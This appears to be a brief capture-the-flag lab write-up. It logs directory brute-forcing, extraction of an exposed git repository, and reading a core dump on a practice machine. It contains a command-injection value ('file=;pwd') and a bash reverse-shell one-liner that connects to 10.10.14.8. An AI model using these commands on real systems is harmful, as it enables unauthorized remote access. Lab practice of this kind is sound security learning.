Reading coredump was fun, but reading long linpeas.sh result was pain.
To get coredump, I learned about kill option.
02:57 feroxbuster
feroxbuster -u http://10.10.11.120 --force-recursion -C 404,405 -m GET,POST
Above returned too many, so decided to focus on api.
feroxbuster -u http://10.10.11.120/api --force-recursion -C 404,405
03:27 use GitTools/Extractor/extractor.sh
git clone https://github.com/internetwache/GitTools.git
/home/kali/workplace/GitTools/Extractor/extractor.sh local-web secret_git
04:44 reverse shell
file=;pwd
“;” indicates that whatever it is before that is done, and starting a new line.
bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
URL encoded special characters before sent.
05:25 Getting coredump
reference here
SIGSEGV – 11 – Core : it is mainly useful for creating core dump file
reference here
PR_SET_DUMPABLE
Set the state of the “dumpable” attribute, which determines whether core dumps are produced for the calling process upon delivery of a signal whose default behavior is to produce a core dump.
How to read crashed coredump:
Ubuntu – How to read a crash file from /var/crash – Unix Server Solutions